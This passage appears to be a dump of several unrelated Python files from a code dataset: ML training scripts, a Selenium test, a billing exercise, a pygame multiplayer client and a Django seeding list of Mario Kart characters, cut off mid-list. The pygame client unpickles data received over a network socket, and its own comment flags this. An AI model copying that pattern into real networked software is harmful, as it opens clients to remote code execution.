index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,100 | d17081ef94df1e14308128341d040559edb81805 | #This file was created by Tate Hagan
from RootGUI import RootGUI
root = RootGUI()
root.mainloop() |
7,101 | f07b95a3b18aecf6cadaa8398c9158a7cd10aeeb | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 4 12:14:16 2020
@author: mdevasish
"""
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression,Lasso,Ridge
from sklearn.metrics import mean_squared_error,mean_absolute_error
from sklearn.model_selection import train_test_split
import joblib
import seaborn as sns
import matplotlib.pyplot as plt
class model_construction:
    """Build, fit, persist and visualise one of sklearn's linear models.

    Wraps LinearRegression / Lasso / Ridge behind a single interface:
    construct with a DataFrame whose LAST column is the target, call
    implement_model() to fit, evaluate and save the model, then use the
    plot helpers on its return values.
    """

    def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter=1000, solver='auto'):
        '''
        Constructor to set the values before creating the model

        Input Parameters :
            data          : Input DataFrame (features first, target as last column)
            model         : One of 'LinearRegression', 'Lasso', 'Ridge'
            fit_intercept : Whether the model fits an intercept term
            alpha         : Regularization constant applicable for Ridge and Lasso
            max_iter      : Maximum iterations applicable for Lasso
            solver        : Type of solver to use applicable for Ridge

        Raises :
            Exception : if model is not one of the three supported names
        '''
        self.data = data
        self.alpha = alpha
        self.max_iter = max_iter
        self.solver = solver
        self.fit_intercept = fit_intercept
        if model == 'LinearRegression':
            self.model = LinearRegression(fit_intercept=self.fit_intercept)
        elif model == 'Lasso':
            self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,
                               fit_intercept=self.fit_intercept)
        elif model == 'Ridge':
            self.model = Ridge(alpha=self.alpha, solver=self.solver,
                               fit_intercept=self.fit_intercept)
        else:
            raise Exception('Wrong input model')

    def implement_model(self, filename):
        '''
        Fit the configured model on a 70/30 train/validation split, print
        evaluation metrics, persist the fitted model with joblib and return
        feature importances plus validation diagnostics.

        Input :
            filename : base name (no extension) for the saved model; the
                       model is written to ./Models/<filename>.sav

        Returns :
            fimp : Feature importance of the model (coefficients with their
                   absolute value and sign category, sorted by magnitude)
            diag : diagnostic dataframe with actual values and predicted
                   values of the validation set
        '''
        df = self.data
        model = self.model
        # Convention: last column is the target, everything before it features.
        X, y = df.iloc[:, :-1], df.iloc[:, -1]
        # Fixed random_state so the split (and reported metrics) are reproducible.
        X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.3, random_state=2020)
        model.fit(X_train, y_train)
        pred = model.predict(X_val)  # predict once, reuse for all metrics below
        print('R square score on train set and test set are :', model.score(X_train, y_train), model.score(X_val, y_val))
        print('Root mean squared error on test set is :', np.sqrt(mean_squared_error(y_val, pred)))
        print('Mean absolute error on test set is :', mean_absolute_error(y_val, pred))
        fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat', 'coeff']).sort_values(by='coeff', ascending=False)
        fimp['abs_coeff'] = fimp['coeff'].abs()  # vectorized; replaces the sign-flip lambda
        fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')
        fimp['rel'] = fimp['rel'].astype('category')
        fimp = fimp.sort_values(by='abs_coeff', ascending=False)
        diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth', 'Predicted'])
        full_name = './Models/' + filename + '.sav'
        joblib.dump(model, full_name)
        return fimp, diag

    def plot_feat_imp(self, fimp, title):
        '''
        Plot feature importances as a bar chart, colored by coefficient sign.

        Input :
            fimp  : Dataframe with feature importance (from implement_model)
            title : Title of the plot

        Displays a plot
        '''
        plt.figure(figsize=(18, 12))
        sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)
        plt.title('Feature Importance plot for ' + title)

    def plot_diagnostic(self, diag):
        '''
        Scatter plot of ground truth vs predicted values on the validation set.

        Input :
            diag : Dataframe with 'Ground Truth' and 'Predicted' columns
                   (from implement_model)

        Displays a plot
        '''
        plt.figure(figsize=(18, 9))
        sns.scatterplot(x='Ground Truth', y='Predicted', data=diag)
        plt.title('Ground Truth vs Predicted on validation Data')
        plt.show()
|
7,102 | d9bf58dc76d4e8d7146fac3bb2bdfb538ebf78a5 | '''import pyttsx3
#engine = pyttsx3.init()
#Conficuraรงรฃo das vozes
#voices = engine.getProperty('voices')
#engine.setProperty('voice', voices[2].id)
engine=pyttsx3.init()
voices=engine.getProperty('voices')
engine.setProperty('voice',voices[3].id)
#Falar texto
engine.say('Olรก meu nome รฉ Jarvis. Sou uma inteligรชncia artificial')
engine.runAndWait()
#print(voices)
#Printa na tela todas as vozes disponรญveis'''
'''for voice in voices:
print("Voice: %s" % voice.name)
print(" - ID: %s" % voice.id)
print(" - Languages: %s" % voice.languages)
print(" - Gender: %s" % voice.gender)
print(" - Age: %s" % voice.age)
print("\n")'''
|
7,103 | 87f8cc65cf7d0ea932de79a6daf5b29ad387ec6f | # Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestSTCHANGE():
    """Selenium-IDE recorded regression test "ST CHANGE".

    Logs in as SUPERVISOR, opens a badge's properties from the BVMAPS grid,
    changes one property value via drag-and-drop, applies, and logs out.

    NOTE(review): the host URL, element ids and the exact click sequence are
    environment-specific recorder output — keep them in sync with the
    application under test rather than editing by hand.
    """

    def setup_method(self, method):
        # Fresh Chrome session for every test method.
        self.driver = webdriver.Chrome()
        self.vars = {}

    def teardown_method(self, method):
        # Always close the browser, even on test failure.
        self.driver.quit()

    def test_sTCHANGE(self):
        # Test name: ST CHANGE
        # Step # | name | target | value
        # 1 | open | /main/desktop-login.html |
        self.driver.get("http://10.51.30.52:8090/main/desktop-login.html")
        # 2 | setWindowSize | 976x696 |
        self.driver.set_window_size(976, 696)
        # 3 | click | id=idInputUsername |
        self.driver.find_element(By.ID, "idInputUsername").click()
        # 4 | type | id=idInputUsername | SUPERVISOR
        self.driver.find_element(By.ID, "idInputUsername").send_keys("SUPERVISOR")
        # 5 | click | id=login-panel |
        self.driver.find_element(By.ID, "login-panel").click()
        # 6 | click | id=idInputPassword |
        self.driver.find_element(By.ID, "idInputPassword").click()
        # 7 | type | id=idInputPassword | **
        self.driver.find_element(By.ID, "idInputPassword").send_keys("**")
        # 8 | click | id=submit.button |
        self.driver.find_element(By.ID, "submit.button").click()
        # 9 | click | id=BVMAPS |
        self.driver.find_element(By.ID, "BVMAPS").click()
        # 10 | click | css=#UI_BADGES_GRID\.gridView\.row\#22_Tcell\#0 > div > div |
        self.driver.find_element(By.CSS_SELECTOR, "#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div").click()
        # 11 | click | id=badge.html.ribbon.properties |
        self.driver.find_element(By.ID, "badge.html.ribbon.properties").click()
        # 12 | click | id=__selection_4 |
        self.driver.find_element(By.ID, "__selection_4").click()
        # 13 | mouseDown | css=#\__pan_4 > .listItemNormal:nth-child(2) |
        # Steps 13-14 emulate a drag from the list item onto the selection target.
        element = self.driver.find_element(By.CSS_SELECTOR, "#\\__pan_4 > .listItemNormal:nth-child(2)")
        actions = ActionChains(self.driver)
        actions.move_to_element(element).click_and_hold().perform()
        # 14 | mouseUp | id=__selection_5 |
        element = self.driver.find_element(By.ID, "__selection_5")
        actions = ActionChains(self.driver)
        actions.move_to_element(element).release().perform()
        # 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |
        self.driver.find_element(By.CSS_SELECTOR, "#PROPERTIES_CONTROLS td:nth-child(2) .middlePart").click()
        # 16 | click | id=badge.html.ribbon.properties.apply |
        self.driver.find_element(By.ID, "badge.html.ribbon.properties.apply").click()
        # 17 | click | css=body > img |
        self.driver.find_element(By.CSS_SELECTOR, "body > img").click()
        # 18 | click | css=a > img |
        self.driver.find_element(By.CSS_SELECTOR, "a > img").click()
        # 19 | click | id=main.html.btn_logout |
        self.driver.find_element(By.ID, "main.html.btn_logout").click()
|
7,104 | 94b3fa700d7da0ca913adeb0ad5324d1fec0be50 | import os
import pandas as pd
import numpy as np
from dataloader import *
from keras.optimizers import Adam, SGD
from mylib.models.misc import set_gpu_usage
set_gpu_usage()
from mylib.models import densesharp, metrics, losses
from keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, EarlyStopping, ReduceLROnPlateau, \
LearningRateScheduler
os.environ['CUDA_VISIBLE_DEVICES'] = '/gpu:0'
def main(batch_size, crop_size, learning_rate, segmentation_task_ratio, weight_decay, save_folder, epochs,
         alpha):
    """Train the DenseSharp joint classification + segmentation network.

    Parameters:
        batch_size              : samples per batch for both loaders
        crop_size               : 3-D crop size for the validation dataset
        learning_rate           : Adam learning rate
        segmentation_task_ratio : loss weight of the 'seg' head relative to 'clf'
        weight_decay            : L2 regularisation factor passed to the model
        save_folder             : subfolder of tmp/ for checkpoints, CSV and TB logs
        epochs                  : number of training epochs
        alpha                   : mixup interpolation strength for the train loader
    """
    print(learning_rate)
    print(alpha)
    print(weight_decay)
    # Mixup-augmented generator for training; plain loader for validation.
    train_dataset = ClfSegDataset(subset=[0, 1])
    train_loader = get_mixup_loader(train_dataset, batch_size=batch_size, alpha=alpha)
    val_dataset = ClfvalSegDataset(crop_size=crop_size, move=None, subset=[2])
    val_loader = get_loader(val_dataset, batch_size=batch_size)
    # NOTE(review): training resumes from a hard-coded pretrained checkpoint —
    # confirm 'tmp/test/weights42_222639.h5' exists before running.
    model = densesharp.get_compiled(output_size=1,
                                    optimizer=Adam(lr=learning_rate),
                                    loss={"clf": 'binary_crossentropy',
                                          "seg": losses.DiceLoss()},
                                    metrics={'clf': ['accuracy', metrics.precision, metrics.recall, metrics.fmeasure,
                                                     metrics.auc],
                                             'seg': [metrics.precision, metrics.recall, metrics.fmeasure]},
                                    loss_weights={"clf": 1., "seg": segmentation_task_ratio},
                                    weight_decay=weight_decay, weights='tmp/test/weights42_222639.h5')
    # Checkpoint every epoch, keep the best model by validation clf accuracy,
    # stop after 20 stale epochs, and shrink the LR on val-loss plateaus.
    checkpointer = ModelCheckpoint(filepath='tmp/%s/weights.{epoch:02d}.h5' % save_folder, verbose=1,
                                   period=1, save_weights_only=True)
    csv_logger = CSVLogger('tmp/%s/training.csv' % save_folder)
    tensorboard = TensorBoard(log_dir='tmp/%s/logs/' % save_folder)
    best_keeper = ModelCheckpoint(filepath='tmp/%s/best.h5' % save_folder, verbose=1, save_weights_only=True,
                                  monitor='val_clf_acc', save_best_only=True, period=1, mode='max')
    early_stopping = EarlyStopping(monitor='val_clf_acc', min_delta=0, mode='max',
                                   patience=20, verbose=1)
    lr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=0.334, patience=10,
                                   verbose=1, mode='min', epsilon=1.e-5, cooldown=2, min_lr=0)
    model.fit_generator(generator=train_loader, steps_per_epoch=50, max_queue_size=10, workers=1,
                        validation_data=val_loader, epochs=epochs, validation_steps=50,
                        callbacks=[checkpointer, csv_logger, best_keeper, early_stopping, lr_reducer, tensorboard])
if __name__ == '__main__':
main(batch_size=32,
crop_size=[32, 32, 32],
learning_rate=1.e-5,
segmentation_task_ratio=0.2,
weight_decay=0.0,
save_folder='test',
epochs=10,
alpha=1.0) |
7,105 | 0158141832423b567f252e38640e384cdf340f8b | # question 1d
# points: 6
import sys
import numpy as np
from astropy.stats import kuiper
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import handin2 as nur
def main():
    """Compare a hand-rolled Kuiper test against astropy's implementation.

    Generates 1e5 deviates with the custom RNG from handin2, maps them to
    normal deviates, evaluates both Kuiper statistic/probability
    implementations on logarithmically growing slices of the sample, and
    writes two comparison plots to ./plots/.
    """
    seed = 8912312
    np.random.seed(seed)  # reuse the same value instead of repeating the literal
    u = 0       # mean of the target normal distribution
    sigma = 1   # standard deviation of the target normal distribution
    cdf = nur.gaussian_cdf
    num_samples = np.logspace(1, 5, num=50)  # slice sizes, 10 .. 1e5, log spaced
    sample_size = int(1e5)
    my_k = np.zeros(50)
    my_p = np.zeros(50)
    pyth_k = np.zeros(50)
    pyth_p = np.zeros(50)
    # random number params
    x = np.zeros(sample_size)
    # NOTE(review): y is never filled with random values — verify that
    # nur.normalize_random_distribution really only consumes x.
    y = np.zeros(sample_size)
    xn = np.zeros(sample_size)
    yn = np.zeros(sample_size)
    # want to generate one sample of 1e5 numbers then take slices
    for i in range(sample_size):
        x[i], seed = nur.rng(seed)
        xn[i], yn[i] = nur.normalize_random_distribution(x[i], y[i], u, sigma)
    for i, s in enumerate(num_samples):
        # slice of x at given s
        x_s = xn[:int(s)]
        x_k = x[:int(s)]
        my_k[i], my_p[i] = nur.kuiper_test(x_s, cdf)
        pyth_k[i], pyth_p[i] = kuiper(x_k)
    # plotting procedure
    plt.figure(1, figsize=(7, 5))
    plt.plot(num_samples, my_k, c='b', ls='None', marker='.', markersize=1,
             label='my kuiper test')
    plt.plot(num_samples, pyth_k, c='r', ls='None', marker='s', markersize=1,
             label='astropy kuiper test')
    plt.xscale('log')
    plt.xlabel("number of points")
    plt.ylabel("kuiper statistic")
    plt.legend()
    plt.savefig('./plots/kuiper_stat.png', format='png', dpi=300)
    plt.figure(2, figsize=(7, 5))
    plt.plot(num_samples, my_p, c='b', label='my probabilities')
    plt.plot(num_samples, pyth_p, c='r', label='astropy probabilities')
    plt.xscale('log')
    plt.xlabel('sample size')
    plt.ylabel('probabilities')  # fixed typo: was 'probabilties'
    plt.legend(frameon=False, loc='best')
    plt.savefig('./plots/k_prob.png', format='png', dpi=300)
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
|
7,106 | b11210e73b403bc7a9ee24a53201ab2366ec1808 | class item():
def __init__(self,iname,itq,iup):
self.iname = iname
self.itq = itq
self.iup = iup
class store():
    """Tiny store front backed by a dict of name -> [quantity, unit_price]."""

    def __init__(self, dic):
        # dic maps item name -> [remaining quantity, unit price]
        self.dic = dic

    def add(self, iname, itq, iup):
        '''Register (or overwrite) an item with quantity itq and unit price iup.'''
        # The original also built an unused `item` instance here; that dead
        # allocation is removed — only the dict entry matters.
        self.dic[iname] = [itq, iup]

    def callbill(self, rname, rq):
        '''Bill rq units of item rname.

        Sells at most the remaining stock, decrements the stock, and returns
        the bill amount. Returns None when the item is unknown or sold out.
        (The original wrapped this single-pass decision in a pointless
        range(len(dic)) loop that always exited on the first iteration.)
        '''
        if rname not in self.dic:
            return None
        qty, price = self.dic[rname]
        if qty == 0:
            return None
        sold = min(qty, rq)  # cannot sell more than is in stock
        self.dic[rname][0] = qty - sold
        return price * sold

    def pri(self):
        '''Print each item name with its remaining quantity.'''
        for name in self.dic:
            print(name, self.dic[name][0])
# Interactive driver: reads n items (name, unit price, then total quantity),
# then r billing requests (name, quantity); prints the bill for each request
# and finally the remaining stock of every item.
n = int(input())
dic = {}
s = store(dic)
for i in range(0, n):
    iname = input()
    iup = int(input())   # note: unit price is entered before quantity
    itq = int(input())
    s.add(iname, itq, iup)
#s.pri()
r = int(input())
for i in range(0, r):
    rname = input()
    rq = int(input())
    print("Bill of item", rname, "=", s.callbill(rname, rq))
s.pri()
|
7,107 | 418798369578e80ecbf82da802b23dc6ca922569 | import pickle
import select
import socket
import sys
from threading import Thread
from typing import Dict, Tuple
import pygame
from pygame.locals import *
import c
from models import *
class Game:
    """Pygame client for a small multiplayer socket game.

    Exchanges pickled Event objects (from `models`) with the server over a
    TCP socket and renders every known player as a colored square with a
    nickname label above it.
    """

    # NOTE(review): these mutable containers are class attributes shared by
    # all instances; harmless here because only one Game is ever created.
    location: list[float] = [c.WIDTH / 2, c.HEIGHT / 2]  # own player's x, y
    velocity: list[int] = [0, 0]                         # pixels per frame on x, y
    current_player: "Player | None" = None               # set by CurrentPlayerEvent
    # nickname -> (Player, (x, y)) for every other connected player
    other_players: Dict[str, Tuple[Player, Tuple[int, int]]] = {}
    connection: socket.socket
    font: pygame.font.Font

    def __init__(self):
        """Initialise pygame, the window, the clock and the TCP socket."""
        pygame.init()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.screen = pygame.display.set_mode((c.WIDTH, c.HEIGHT))
        pygame.display.set_caption('Socket Game')
        self.clock = pygame.time.Clock()
        self.screen.fill('white')
        self.font = pygame.font.SysFont(None, c.FONT_SIZE)

    def start(self):
        """Connect to the server, then run the game loop forever."""
        self.connect_to_server()
        while True:
            self.game_loop()

    def connect_to_server(self):
        self.connection.connect((c.HOST, c.PORT))

    def listen_to_server(self):
        """Drain pending server events without blocking (zero-timeout select)."""
        ins, outs, ex = select.select([self.connection], [], [], 0)
        for inm in ins:
            received_data = inm.recv(c.BUFFSIZE)
            # SECURITY: pickle.loads on network data can execute arbitrary code
            # if the server is untrusted — acceptable only for this toy game.
            event: Event = pickle.loads(received_data)
            print("<<<", event)
            if isinstance(event, CurrentPlayerEvent):
                pygame.display.set_caption(f'Socket Game - {event.player.nickname}')
                self.current_player = event.player
            elif isinstance(event, PlayerDidMoveEvent):
                self.update_player(event.player, event.location)
            elif isinstance(event, PlayerJoinedEvent):
                self.update_player(event.player)

    def update_player(self, player: Player, location=(c.WIDTH / 2, c.HEIGHT / 2)):
        """Record (or refresh) another player's latest known location."""
        self.other_players[player.nickname] = (player, location)

    def update_server(self):
        """Send our current position to the server (once our identity is known)."""
        if self.current_player is not None:
            self.connection.send(pickle.dumps(PlayerDidMoveEvent(self.current_player, (
                self.location[0], self.location[1],
            ))))

    def game_loop(self):
        """One frame: network in, input, movement, render, network out, 60 FPS cap."""
        self.listen_to_server()
        self.event_handling()
        self.update_location()
        self.render()
        self.update_server()
        self.clock.tick(60)

    def update_location(self):
        """Advance position by the current velocity, clamped to window bounds."""
        oldx, oldy = self.location
        vx, vy = self.velocity
        newx, newy = oldx + vx, oldy + vy
        if newx > c.WIDTH - c.PLAYER_SIZE:
            newx = c.WIDTH - c.PLAYER_SIZE
        if newx < 0:
            newx = 0
        if newy > c.HEIGHT - c.PLAYER_SIZE:
            newy = c.HEIGHT - c.PLAYER_SIZE
        if newy < 0:
            newy = 0
        self.location = [newx, newy]

    def render_player(self, player: Player, location: Tuple[int, int]):
        """Draw one player square with its nickname label just above it."""
        x, y = location
        img = self.font.render(player.nickname, True, player.color)
        pygame.draw.rect(self.screen, player.color, (x, y, c.PLAYER_SIZE, c.PLAYER_SIZE))
        self.screen.blit(img, (x, y - img.get_height()))

    def render(self):
        """Clear the frame, draw ourselves and all other players, then flip."""
        self.screen.fill((255, 255, 255))
        if self.current_player is not None:
            self.render_player(self.current_player, (self.location[0], self.location[1]))
        for nickname, (player, location) in self.other_players.items():
            self.render_player(player, location)
        pygame.display.flip()

    def event_handling(self):
        """Map arrow-key press/release to velocity; handle the window close."""
        for event in pygame.event.get():
            if event.type == QUIT:
                pygame.quit()
                sys.exit()
            if event.type == KEYDOWN:
                if event.key == K_LEFT: self.velocity[0] = -c.MOVEMENT_SPEED
                if event.key == K_RIGHT: self.velocity[0] = c.MOVEMENT_SPEED
                if event.key == K_UP: self.velocity[1] = -c.MOVEMENT_SPEED
                if event.key == K_DOWN: self.velocity[1] = c.MOVEMENT_SPEED
            if event.type == KEYUP:
                if event.key == K_LEFT: self.velocity[0] = 0
                if event.key == K_RIGHT: self.velocity[0] = 0
                if event.key == K_UP: self.velocity[1] = 0
                if event.key == K_DOWN: self.velocity[1] = 0
if __name__ == "__main__":
s = Game()
s.start()
|
7,108 | dbda5df7dff3f8acc320ffe7b9c7c279ebed2cc2 | import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE','mkrandom.settings')
import django
django.setup()
from main.models import Character, Vehicle, Tire, Glider
char_names = [
'Mario',
'Luigi',
'Peach',
'Daisy',
'Rosalina',
'Mario Tanooki',
'Peach cat',
'Yoshi',
'Yoshi (LBlue)',
'Yoshi (Black)',
'Yoshi (Rose)',
'Yoshi (Yellow)',
'Yoshi (White)',
'Yoshi (Blue)',
'Yoshi (Rose)',
'Yoshi (Orange)',
'Toad',
'Koopa',
'Shyguy',
'Shyguy (LB)',
'Shyguy (Black)',
'Shyguy (Rose)',
'Shyguy (Yellow)',
'Shyguy (White)',
'Shyguy (Blue)',
'Shyguy (Rose)',
'Shyguy (Orange)',
'Lakitu',
'Toadette',
'Boo',
'Baby Mario',
'Baby Luigi',
'Baby Peach',
'Baby Daisy',
'Baby Rosalina',
'Metal Mario',
'Golden Mario',
'Golden Peach',
'Wario',
'Waluigi',
'Donkey Kong',
'Bowser',
'Skelerex',
'Bowser Jr',
'Dry Bowser',
'Lemmy',
'Larry',
'Wendy',
'Ludwig',
'Iggy',
'Roy',
'Morton',
'Inkling (G)',
'Inkling (B)',
'Link (SSBU)',
'Link (BOTW)',
'Villager (B)',
'Villager(G)',
'Mary',
]
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr',
'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr',
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png',
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png',
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809',
'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr',
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr',
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png',
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png',
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr',
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo',
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png',
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM',
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ',
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708',
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649',
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910',
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014',
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222',
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png',
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png',
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117',
'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323',
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405',
